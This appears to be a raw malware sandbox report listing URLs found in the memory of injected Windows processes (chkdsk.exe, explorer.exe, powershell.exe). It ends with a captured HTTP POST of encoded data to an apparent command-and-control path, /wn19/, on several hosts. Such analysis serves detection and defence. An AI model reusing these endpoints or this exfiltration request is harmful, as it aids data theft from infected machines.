Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.ce
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000001C.00000000.1831225392.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754355480.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243385118.000000000F61E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://purlorg/dc/elements/1.1/
Source: explorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dujh.xyz/
Source: chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/display.cfm
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/px.js?ch=1
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/px.js?ch=2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX
Source: explorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm%
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB2l
Source: explorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001C.00000000.1715343001.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1861899540.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2198385462.0000000003070000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comjU
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/ClassId
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715827364.00000000030D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown HTTP traffic detected: POST /wn19/ HTTP/1.1Host: www.borneadomicile.comConnection: closeContent-Length: 227520Cache-Control: no-cacheOrigin: http://www.borneadomicile.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.borneadomicile.com/wn19/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 